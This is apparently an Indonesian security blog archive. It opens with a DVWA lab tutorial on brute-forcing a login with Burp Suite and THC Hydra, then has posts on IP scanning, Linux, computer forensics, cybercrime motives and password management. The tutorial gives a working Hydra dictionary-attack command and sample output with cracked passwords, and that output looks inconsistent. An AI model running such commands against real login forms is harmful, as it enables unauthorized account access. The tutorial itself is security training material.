Jumat, 31 Maret 2017

DVWA Brute Force Login untuk Security Level Low



Berikut ini adalah tutorial bagaimana caranya melakukan brute force attack untuk memperoleh passsword di DVWA dengan low securiry.

Kebutuhan Alat
  • Kali Linux
  • DVWA x1.9 jalan di mesin yang terpisah
STEP 1: Intelejen
Pekerjaan rumah yang harus di selesaikan adalah mencari tahu,
  • apa yang terjadi saat user submit form?
  • apakah GET atau POST request?
  • kemana request tersebut di kirim?
  • bentuk data yang dikirim?
Kita akan menggunakan Burp Suite di Kali Linux sebagai proxy. Untuk membayangkan posisi burpsuite sebagai proxy adalah sebagai berikut,

HTTP request tanpa proxy
Browser -> Target server

HTTP request dengan proxy
Browser -> Proxy server -> Target server

Dengan Burp Suite bekerja sebagai proxy, kita bisa melihat / inspect HTTP request yang terjadi.

Siapkan DVWA
Yang perlu di siapkan adalah menset security level menjadi low
  • login ke DVWA
  • klik DVWA Security (di bagian bawah)
  • ubah Security Level > Low
  • klik Submit
Setup burpsuite proxy
Masuk ke
   Applications > Favorites > burpsuite

Cek proxy running
   Klik Proxy (Tap Kiri Atas) > Options

lihat bahwa:
   proxy berjalan di 127.0.0.1:8080
   kondisi running

Setup Browser
Setup browser, di Kali Linux kita menggunakan Iceweasel. Pastikan proxy menggunakan burpsuite, caranya,

 Klik kanan pada Iceweasel > aktifkan menu - supaya hidup kita mudah.
 Klik Edit > Preferences > Advanced > Network > Settings
 Pindahkan dari
       use system proxy settings > manual proxy configuration
       Pastikan proxy di set ke burpsuite 127.0.0.1 port 8080

Silahkan browse ke sasaran dengan kondisi brupsuite interceptor on.

Analisa login request
Dengan interceptor enabled. Browse ke sasaran, misalnya,

   http://target.site/DVWA-1.0/vulnerabilities/brute/
   http://192.168.0.100/DVWA-1.0/vulnerabilities/brute/

Semua request dari browser akan di tahan oleh brupsuite. Kita dapat inspect, modify, drop, atau forward request tersebut.

Tanpa memasukan username / password, tekan tombol login. Lihat reqest yang ada di brupsuite. Kita harusnya melihat beberapa key info,

    Ini adalah GET request
    login paramater (username=&password=&Login=Login)
    cookie (security=low; PHPSESSID=ahs8eugnukjkh9auegathrbfg5)

Dengan informasi ini kita dapat mebuat request yang sama, dan menggunakannya untuk brute force attack.

STEP 2: attack.
Kita akan menggunakan THC hydra untuk melakukan rapid dictionary attack pada layanan authentikasi. hydra mempunyai banyak pilihan, bisa dilihat menggunakan

 hydra -h

Yang kita perlu masukan ke hydra untuk serangan kita adalah:

    target server
    URL path
    username
    password dictionary
    cookie
    failure message

Kita akann cheat sedikit dengan menggunakan username admin, kita bisa saja menggunakan username dictionary, hanya membuat proses menjadi lebih lama. Kita akan fokus ke password dulu.
Failure message adalah responds yang akan kita dapat dari login form jika kita gagal login. Ini adalah string yang di cari hydra dari responds HTML yang ada.
Hasil akhir perintah hydra yang akan digunakan adalah sebagai berikut,

hydra 192.168.0.100 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt  http-get-form "/DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=ahs8eugnukjkh9auegathrbfg5"

In action:
Setelah hydra di jalankan, hasilnya kira-kira,

 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

 Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-04 05:28:01
 [DATA] max 16 tasks per 1 server, overall 64 tasks, 141 login tries (l:1/p:141), ~0 tries per task
 [DATA] attacking service http-get-form on port 80
 [80][http-get-form] host: 192.168.0.100   login: admin   password: test
 [80][http-get-form] host: 192.168.0.100   login: admin   password: testing123
 [80][http-get-form] host: 192.168.0.100   login: admin   password: testtest
 [80][http-get-form] host: 192.168.0.100   login: admin   password: testing
 [80][http-get-form] host: 192.168.0.100   login: admin   password: test-sql3
 [80][http-get-form] host: 192.168.0.100   login: admin   password: bankbank
 [80][http-get-form] host: 192.168.0.100   login: admin   password: testing
 [80][http-get-form] host: 192.168.0.100   login: admin   password:  sqlsqlsqlsqlsql
 [80][http-get-form] host: 192.168.0.100   login: admin   password: password2
 [80][http-get-form] host: 192.168.0.100   login: admin   password: default
 [80][http-get-form] host: 192.168.0.100   login: admin   password: password
 [80][http-get-form] host: 192.168.0.100   login: admin
 [80][http-get-form] host: 192.168.0.100   login: admin   password: test
 1 of 1 target successfully completed, 13 valid passwords found
 Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-04 05:28:02

Terlihat dengan jelas ada 13 valid password admin :) ...Yang normal kita gunakan biasanya username admin password password.


Referensi
  • http://lms.onnocenter.or.id/wiki/index.php/DVWA:_Brute_Force_login_low
  • https://medium.com/@dannybeton/dvwa-brute-force-tutorial-low-security-463880d53e50#.gezblpmna
  • https://c.uctalks.ucweb.com/detail/b283d3bf88cb4a06b16ffd073027bc77?uc_param_str=dnvebichfrmintcpwidsudsvnwpflameefut

Senin, 16 Mei 2016

Scanning IP Jaringan Menggunakan Advance IP Scanner

  
Teknologi jaringan sekarang ini semakin berkembang , sisi portablelitas serta efektifitas sangat diutamakan dalam pemilihan tools jika kita bertugas untuk mengurusi jaringan kantor ataupun sekolah , kampus , warnet ataupun sekolah sekolah tentu kita membutuhkan sebuah tools yang dapat melihat siapa saja yang aktif dalam jaringan , remote komputer wake-on-lan dll kita tidak perlu bingung bingung cukup dengan menggunakan tools gratis ini kita sudah bisa fast network scanning.

Dengan IP Scanner, kita dapat memindai ratusan alamat IP secara simultan pada kecepatan tinggi, tools ini mendukung pemindaian HTTP, HTTPS, FTP dan shared folder. Memindai jaringan untuk mendapatkan informasi detail tentang semua perangkat yang terhubung termasuk nama komputer dan MAC address-nya.

dan masih banyak lagi kegunaanyan seperti remote pc shutdown dll semuanya tergantung siapa yang menggunkan dan untuk tujuan apa penulis tidak menyediakan link download jika penasaran untuk mencoba nya silahkan pembaca browsing di mbah google, ooh yaaa terakhir tools ini bisa dijalankan langsung tanpa harus di install .




Rabu, 27 April 2016

Alasan, kenapa harus pakai linux ?

1. Linux itu Gratis & Open Source
Jika anda tidak ingin berurusan soal pembatasan dalam hak paten, maka linux adalah pilihan terbaik untuk anda. Linux dapat di edit source code nya, bahkan banyak perusahaan yang sangat inovatif melakukan hal tersebut, oleh karena itu sistem operasi ini banyak di adopsi oleh perusahaan bisnis.

2. Linux Lebih Aman Dibanding Server Lain
Linux bisa menjadi server yang sangat handal untuk sistem anda, linux memberikan keamanan yang sangat baik untuk para pengguna. Komunitas linux memberikan perbaikan-perbaikan keamanan untuk setiap ancaman keamanan yang ditemukan. Selain itu, pengguna linux juga menawarkan update kernel reguler dan patch keamanan secara rutin. Dalam hal ini, berarti tidak wajib bagi anda untuk memiliki program anti-virus untuk sistem anda. Dengan linux, Anda dapat menyimpan banyak dana/uang yang biasa anda gunakan untuk membeli lisensi program antivirus.

3. Memiliki Kompatibilitas Yang Baik Dengan Berbagai Hardware.
Sebagian besar server lain memiliki kendala dengan banyak fitur. Ambil contoh windows 7 atau 8 yang membutuhkan setidaknya 1GB RAM untuk sistem anda agar beroperasi dengan baik. Namun, Linux adalah suatu sistem operasi ringan dan tidak membatasi anda dalam hal kapasitas memori sistem.

4. Linux Mudah Di Operasikan
Seseorang tidak harus pergi kesebuah pelatihan yang intensif untuk mengetahui bagaiman mengoperasikan sistem operasi Linux. Selain itu, linux memiliki hampir semua fungsi yang disertakan di sistem operasi lain seperti windows. Jika anda mencari sistem operasi yang dapat diandalkan untuk bisnis anda, maka Linux bisa menjadi pilihan terbaik anda.

5. Hadir Dengan Driver Yang Lengkap
Anda pasti pernah punya masalah driver di Windows, dimana sistem windows memberi tahu anda bahwa beberapa driver ada yang hilang dalam sistem anda. Dengan linux anda kecil kemungkinan mengalami hal tersebut, anda tidak perlu capek-capek mencari berbagai driver dari satu tempat ke tempat lain. Ini menghemat pengeluaran anda juga, karena sebagian besar driver sudah di sertakan dalam sistem operasi Linux. Tidak perlu repot dan stres memikirkan driver hardware yang rusak.

6. Mudah di Update
Melakukan update sistem windows kadang bisa membuat kita kesulitan dan stress. Update linux baik OS maupun aplikasi nya sangat mudah, bila dibandingkan dengan Windows yang kadang mengharuskan anda untuk restart atau shut down komputer anda, maka dengan linux anda cukup klik saja.

7. Linux itu Cepat
Karena linux itu ringan, maka linux lebih cepat dibanding sistem operasi lain. Windows memiliki software yang ukuran nya besar dan oleh karena itu cenderung lebih berat untuk dioprasikan. Dalam suatu kasus seperti operasi bisnis dengan skala besar atau untuk kenyamanan bermain game, waktu adalah faktor yang sangat penting. Linux dianggap lebih baik juga dalam hal ini.

8. Linux Memiliki Komunitas Yang Besar
Salah satu alasan terbaik tentang Linux adalah kenyataan bahwa anda akan memiliki rasa memiliki. Anda memiliki platform dimana anda dapat berbagi segalanya dengan sesama pengguna/komunitas linux. Anda dapat menemukan jawaban pertanyaan-pertanyaan yang sering ditanyakan tentang masalah linux, atau jika pertanyaan anda tergolong beda maka komunitas anda akan sengat senang membantu. Banyaknya komunitas memungkinkan masalah anda akan lebih mudah terselesaikan dibanding menggunakan Sistem Operasi yang penggunanya sedikit.

9. Linux Junga Memiliki Sistem Pengolah Kata Yang Powerful
Jika anda bilang windows sangat baik karena memiliki Microsoft Word yang begitu powerful, maka di Linux anda juga bisa menemukan hal serupa, karena linux memiliki Libre office ataupun Open Office yang kemampuannya tidak kalah dibanding Microsoft Word, bahkan tidak seperti Microsoft Word yang harus anda beli, Libre office dan Open Office dapat anda gunakan secara gratis.

10. Linux Memiliki Segudang Aplikasi Gratis
Dengan hanya mengklik tombol, anda bisa mendapatkan akses ke ribuan tool dan program. Ini adalah keuntungan tambahan yang sangat menonjol dibanding Windows.
Bayangkan anda harus membayar ratusan bahkan ribuan dollar untuk Microsoft Office dan Photoshop, di Linux anda akan menemukan aplikasi serupa dengan harga Gratis.


Sampai dengan tulisan ini di buat penulis masih setia dengan beberapa operation sistem dari linux salah satu distro yg digemari oleh penulis adalah Ubuntu dan Backbox.


sumber :JW


Sabtu, 09 April 2016

Computer Forensic


Saat ini teknologi komputer dapat digunakan sebagai alat bagi para pelaku kejahatan komputer : seperti pencurian, penggelapan uang dan lain sebagainya. Barang bukti yang berasal dari komputer telah muncul dalam persidangan hampir 30 tahun. Awalnya hakim menerima bukti tersebut tanpa membedakannya dengan bentuk bukti lainnya. Namun seiring dengan kemajuan teknologi komputer, perlakuan tersebut menjadi membingungkan.

Bukti yang berasal dari komputer sulit dibedakan antara yang asli ataupun salinannya. Karena berdasarkan sifat alaminya data yang ada dalam komputer sangat mudah dimodifikasi. Proses pembuktian bukti tindak kejahatan tentunya memiliki kriteria-kriteria, demikian jua dengan proses pembuktian pada bukti yang didapat dari komputer.

Di awal tahun 1970-an Kongres Amerika Serikat mulai merealisasikan kelemahan hukum yang ada dan mencari solusi terbaru lebih cepat dalam penyelesaian kejahatan komputer. US Federals Rule of Evidence 1976 menyatakan permasalahan tersebut. Hukum lainnya yang menyatakan permasalahan tersebut adalah :

- Economiv Espionage Act 1996, berhubungan dengan pencurian rahasia dagang
- The Electronic Comunications Privacy Act 1986 berkaitan dengan penyadapan peralatan elektronik
- The Computer Security Act 1987 (Public Law 100-235). berkaitan dengan keamanan sistem komputer pemerintah

=========================
Definisi Komputer Forensik :
=========================

~Definisi Sederhana~
Penggunaan sekumpulan prosedur untuk melakukan pengujian secara enyeluruh suatu sistem komputer dengan menggunakan software dan tool untuk mengambil dan memelihara barang bukti tindakan kriminal"

~Menurut Judd Robin (pakar forensik)~
Penerapan secara sederhana dari penyelidikan komputer dan tekhnik analisisnya untuk menentukan bukti-bukti hukum yang mungkin"

~New Technologies memperluas definisi Judd Robin~
Komputer Forensik berkaitan dengan pemeliharaan identifikasi, ekstrasi dan dokumentasi bukti-bukti komputer yang tersimpan dalam wujud informasi magnetik"

~Menurut Dan Farmer & Wietse Venema~
Memperoleh dan menganalisa data dengan cara yang bebas dan distorsi atau bias sebisa mungkin, untuk merekonstruksi data atau apa yang telah terjadi pada waktu sebelumnya di suatu sistem

==========================
Kebutuhan akan Forensik
==========================

- Operational Troubleshooting :

Banyak tool dan teknik forensik dapat digunakan untuk melakukan troubleshooting atas masalah masalah operasional, seperti menemukan lokasi fisik dan virtual sebuah host dengan konfigurasi jaringan tidak tepat mengatasi masalah fungsional dalam sebuah aplikasi

- Log Monitoring

Beragam tool dan teknik dapat membantu dalam melakukan monitoring log, seperti menganalisis entri log dan mengkorelasi entri log dari beragam sistem. Hal ini dapat membantu dalam penanganan insiden, mengidentifikasi pelanggaran kebijakan, audit dan usaha lainnya

- Data Recovery

Terdapat lusinan tool yang dapat mengembalikan data yang hilang dari sistem, termasuk data yang telah dihapus atau dimodifikasi baik yang disengaja maupun tidak

- Data Acquisition

Beberapa organisasi menggunakan tool forensik untuk mengambil data dari host yang telah dipensiunkan. Sebagai contoh, ketika seorang user menginggalkan organisasi, data dari komputer user tersebut dapat diambil dan disimpan bilamana dibutuhkan di masa mendatang. media komputer tersebut lalu dapat disanitasi untuk menghapus semua data user tersebut

- Due Diligence/ Regulatory Compliance

Regulasi yang ada dan yang akan muncul mengharuskan organisasi melindungi informasi sensitif dan memelihara beberapa catatan tertentu demi kepentingan audit. Juga, ketika informasi yang dilindungi terekspos ke pihak lain, organisasi mungkin diharuskan untuk memberitahu pihak atau individu yang terkena dampaknya. Forensik dapat membantu organisasi melakukan due diligence dan mematuhi persyaratan tersebut

==================
Barang Bukti Digital
==================

Bukti digital adalah informasi yang didapat dalam bentuk/ format digital (scientific Working Group on Digital Evidence, 1999). Beberapa contoh bukti digital antara lain :

- Email-alamat email
- File wordprocessor/ spreadsheet
- source code sopwer
- file berbentuk image
- webBrowser bookmark, cookies
- kalender, to-do list

Bukti digital tidak dapat langsung dijadikan barang bukti pada proses peradilan, karena menurut sifat alamiahnya bukti digital sangat tidak konsisten. Untuk menjamin bahwa bukti digital dapat dijadikan barang bukti dalam proses peradilan maka diperlukan sebuah standar data digital yang dapat dijadikan barang bukti dan metode standar dalam pemrosesan barang bukti digital dapat dijamin keasliannya dan dapat dipertanggungjawabkan.

Berikut ini adalah aturan standar agar bukti dapat diterima dalam proses peradilan :

1. dapat diterima, artinya data harus mampu diterima dan digunakan demi hukum mulai dari kepentingan penyelidikan sampai dengan kepentingan pengadilan.
2. Asli, artinya bukti tersebut harus berhubungan dengan kejadian/ Kasus yang terjadi dan bukan rekayasa
3. Lengkap, artinya bukti bisa dikatakann bagus dan lengkap jika di dalamnya terdapat banyak petunjuk yang dapat membantu investigasi
4. Dapat dipercaya, artinya bukti dapat mengatakan hal yang terjadi di belakangnya jika bukti tersebut dapat dipercaya, maka proses investigasi akan lebih mudah, syarat dapat dipercaya ini merupakan suatu keharusan dalam penanganan perkara

Untuk itu perlu adanya metode standar dalam pengambilan data atau bukti digital dan pemrosesan barang bukti data digital, untuk menjamin keempat syarat di atas terpenuhi. Sehingga data yang diperoleh dapat dijadikan barang bukti yang legal di pengadilan dan diakui oleh hukumm

========================
Metodologi Standar Forensik
========================

Pada dasarnya tidak ada suatu metodologi yang sama dalam pengambilan bukti pada data digital, karena setiap kasus adalah unik sehingga memerlukan penanganan yang berbeda. Walaupun demikian dalam memasukan wilayah hukum formal, tentu saja dibutuhkan suatu aturan formal yang dapat melegalkan suatu investigasi

Untuk itu menurut US department of Justice ada tiga hal yang ditetapkan dalam memperoleh bukti digital :

- Tindakan yang diambil untuk mengamankan dan mengumpulkan barang bukti digital tidak boleh mempengaruhi integritas data tersebut
- Seseorang yang melakukan pengujian terhadap data digital harus sudah terlatih
- Aktivitas yang berhubungan dengan pengambilan, pengujian, penyimpanan atau pentransferan barang bukti digital harus didokumentasikan dan dapat dilakukan pengujian ulang

Selain itu terdapat pula beberapa panduan keprofesian yang diterima secara luas :

- Pengujian forensik harus dilakukan secara menyeluruh. Pekerjaan menganalisa media dan melaporkan temuan tanpa adanya prasangka atau asumsi awal
- Media yang digunakan pada pengujian forensik harus disterilisasi sebelum digunakan
- Image bit dari media asli harus dibuat dan dipergunakan untuk analisa
- Integritas dari media ali harus dipelihara selama keseluruhan penyelidikan

Dalam Kaitan terdapat akronim PPAD pada komputer forensik

P reserve ( memelihara data untuk menjamin data tidak berubah )
P rotect ( melindungi data untuk menjamin tidak ada yang mengakses barang bukti )
A nalysis ( melakukan analisis data yang menggunakan teknik forensik )
D ocument ( mendokumentasikan semuanya termasuk langkah-langkah yang dilakukan )

Dari beberapa uraian di atas sudah sangat jelas bahwa tujuan pendefinisian metodologi standar adalah untuk melindungi bukti digital. mengenai penentuan kebijakan dan prosedur teknis dalam pelaksanaan dapat disusun kemudian oleh instansi yang terkait, tentunya dengan mengacu pada metode-metode standar yang telah ada dan disesuaikan dengan hukum yang berlaku di negara yang bersangkutan. Dari beberapa metodologi di atas dapat digaribawahi bahwa penggunaan bukti asli dalam investigasi sangat dilarang dan bukti ini harus dijaga agar jangan sampai ada perubahan di dalamnya karena akan sangat mempengaruhi kesimpulan yang diambil.

===========================
Pemrosesan Barang Bukti
===========================

Barang bukti sangat penting keberadaanya karena sangat menentukan keputusan di pengadilan. untuk itu pemrosesan barang bukti dalam analisan forensik sangat diperhatikan. Berikut ini adalah panduan umum dalam pemrosesan barang bukti menurut Lori Willer dalam bukunya "Computer Forensic"

- Shutdown komputer, WAJIB dipertimbangkan karena jika komputer sudah mati dapat terjadi hilangnya informasi proses yang sedang berjalan
- Dokumentasikan konfigurasi hardware sistem, perhatikan bagaimana komputer disetup karena mungkin akan diperlukan restore kondisi semula pada tempat yang aman
- pindahkan sistem komputer ke lokasi yang aman
- buat backup secara bit-by-bit dari hardisk dan floppy barang bukti asli
- uji ke-otentikan data pada semua perangkat penyimpanan
- dokumentasikan tanggal dan waktu yang berhubungan dengan file komputer
- buat daftar keyword pencarian
- evaluasi swap file, evaluasi slack file
- evaluasi unallocated space (erased file )
- pencarian keyword pada file, file slack dan unallocated space
- dokumentasikan nama file, serta atribut tanggal dan waktu
- identifikasikan anomali file, program untuk mengetahui kegunaannya
- dokumentasikan temuan dan software yang dipergunakan
- buat salinan software yang dipergunakan


Untuk memastikan bahwa media bukti digital tidak dimodifikasi, sebelum ia(hardisk/ barang bukti) digunakan untuk dipublikasi, ia harus diset ke Read Only Locked atau Write Protect, untuk mencegah terjadinya modifikasi yang tidak disengaja. Secara baku, SLAX4 menset seluruh device secara read only, sehingga mereka tidak dapat dimodifikasi dengan mudah. Namun demikian, saya tetap menyarankan untuk melindungi media digital tersebut menggunakan hardware write protector

Senin, 04 April 2016

Motivasi Motivasi Orang Melakukan CYBER CRIME

Mungkin korban dari Kejahatan Cyber sering bertanya-tanya, apa sih yang menjadi motivasi  cyber Crime sehingga menyerang dia secara individu, Institusi, Dan Perusahaannya. memang tidak bisa di pungkiri lagi uang adalah salah satu motivasi terbesar para attacker untuk melakukan cyber Crime.  Di samping itu kita perlu tahu apa saja yang menjadi motivasi para attacker untuk menyerang sebuah system. Berikut penjelasannya.

 

1.Money reason Cyber Crime

Memang sudah menjadi rahasia umum bahwa uang adalah penyebab pertama terjadinya cyber crime, dimana banyak modus yang di lakukan oleh pelaku, mulai dari teknik sederhana seperti social engineering, sampai teknik yang paling canggih sekalipun. bahkan menurut hasil research dari IBM  bahwa kemungkinan uang yang didapatkan dari hasil cyber crime bisa mencapai  $2.1 trillion. pada tahun 2019 sungguh jumlah yang sangat-sangat fantastis.

2. Military

Hampir sebagian besar teknologi sebelumnya pasti di jajaki dulu oleh militer. sama halnya salah satu motivasi Cyber espionage kadang  juga alasan militer. misalkan perihal ingin mengetahui kekuatan musuh, penyadapan komunikasi petinggi-petinggi tertentu untuk mengetahui seberapa kekuatan musuh. memang sudah hukumnya saat ini mengetahui kekuatan lawan adalah informasi yang sangat berharga, bahkan sampai melibatkan pelaku-pelaku cyber crime.

3. Balas Dendam dan jiwa patriotisme

ini memang alasan yang sangat masuk akan seseorang atau sekelompok orang untuk melakukan tindak-tindak kejahatan di dunia cyber. Walaupun tetap melanggar biasanya berdalih untuk balas dendam. misalkan saja ada satu negara yang melakukan penyadapan terhadap negara tertentu seperti pada saat kejadian australia indonesia. Maka dengan rasa kecintaan hacker-hacker orang indonesia terhadap negaranya, australia diserang secara digital. Bahkan terjadi cyberwar.
4. Rasa Kemanusiaan
Rasa kemanuasiaan juga bisa jadi penyebab orang melakukan tindakan cyber crime. sebut saja misalnya ketika terjadi pembunuhan si kancil di jawa timur. Para hacker yang merasa mempunyai jiwa kemanusiaan yang tinggi melakukan aktivitas deface untuk menyampaikan aspirasi terhadap pemerintah.
5. Politik
Dunia politik memang dunia yang cukup menarik untuk di ikuti walaupun bagi penulis sendiri sebenarnya kurang suka dengan dunia politik. Politik memang salah satu penyebab peningkatan terjadinya aktivitascyber crime. Kecintaan atau fanatik terhadap salah satu kelompok tertentu akan membuat mereka membela kelompok yang mereka sukai. Atau bisa jadi juga karena mereka di bayar untuk itu.

6. Dan lain-lain
sebenarnya masih banyak lagi alasan-alasan orang melakukan kejahatan cyber yang tidak bisa di sebutkan secara rinci satu persatu. Tetapi apapun alasannya cyber crime tetap merugikan banyak pihak dan tentunya melanggar hukum. kalau mau jadi hacker jadilah hacker yang beretika ya :D "dikutip dari http://hadsec.com/"


Kamis, 31 Maret 2016

Hacking The Passwords



Password, apakah itu ? Siapa yang tidak mengenal Password ?,  Kebanyakan orang saat ini hanya menggunakannya saja, sebagai formalitas tanpa tahu apa sebenarnya Password, apa kegunaan dan manfaatnya dan  yang paling penting adalah bagaimana melindunginya, penulis berikut ini akan mengulas secara sederhana tentang  password dan bagaimana mengelolanya.


Password adalah “Kata Kunci”, itu merupakan terjemahan bahasa Indonesia, gabungan dua kata Pass dan Word,  tetapi sesederhana itu, Password berisi kode-kode tertentu yang  disusun oleh pemiliknya baik oleh individu atau kelompok untuk melakukan sebuah autentikasi terhadap system yang berisi berbagai informasi. Karena begitu pentingnya informasi tersebut, maka banyak orang/hacker mencoba untuk mendapatkan password tersebut untuk dapat masuk kedalam system biasa disebut penetrasi kedalam system, tentu saja untuk mengambil keuntungan di dalam system yang telah dikuasainya.

Password saat ini banyak sekali digunakan dalam berbagai kepentingan Politik, Pertahanan dan
Ekonomi,penulis akan membahas hanya kepadaa spek ekonomi saja seperti autentikasi terhadap mesin ATM, Debit Card (belanja), Credit Card  (untuk ambil uang di ATM), online banking, online payment, e-commerce dsbnya.

Password dulu digunakan sangat sederhana, ada beberapa mesin ATM masih menggunakan 4 digit, kebanyakan sudah menggunakan 6 digit semakin banyak sebuah password akan semakin sulit untuk ditembus, kombinasi angka dan huruf dan berbagai karakter akan mempersulit seseorang dapat menembusnya, password dapat di katakan aman dan kuat apabila dibuat sangat panjang, berisi kombinasi  yang rumit dan dapat diingat hanya olehpemiliknya. 

Sumber : http://www.ignmantra.id/2014/08/password-dan-manajemen-password-bagian-1.html

7 Alasan Pentingnya Manajemen Password


Password merupakan sebuah kata kunci untuk dapat melakukan autentikasi, sehingga banyak orang mencoba-coba untuk mendapatkannya, untuk apakah mereka ingin mendapatkan password, ada berbagai alasan,
  1. Password teman-teman, baik teman kantor, kuliah, sekolah, main, sampai dengan sahabat, tentu saja untuk mengetahui apa saja yang dilakukan teman-teman tersebut.
  2. Password pasangan baik suami, istri maupun pacar, tentu ingin mengetahui, apakah mereka punya selingkuhan atau tidak dan kemana saja mereka pergi.
  3. Password Anak, ingin mengetahui apa saja yang dilakukan oleh anak dan siapa saja teman-temannya.
  4. Password Boss/Atasan, ingin mengetahui apa saja yang dilakukan boss dan pekerjaannya, siapa saja koleganya dan kemana saja aktifitasnya.
  5. Password Admin, ingin mengetahui semua informasi dan hak akses yang ada didalamnya, begitu tembus maka semua hak akses akan berpindah tangan kepada pemilik password tersebut.
  6. Password Lawan dan Kompetitor Bisnis, ingin mengetahui semua rahasia perusahaan lawan, apa saja yang dilakukannya dan apa saja penemuan-penemuan baru mereka.
  7. Password Kejahatan, ingin melakukan tindak kejahatan, mencuri informasi dan memindahkan sejumlah kekayaan dan uang orang lain kepada si hacker, di gunakan untuk belanja dan menguras harta si pemilik password atau merusak nama baik orang lain. 

Sumber : http://www.ignmantra.id/2014/09/7-alasan-pentingnya-manajemen-pasword.html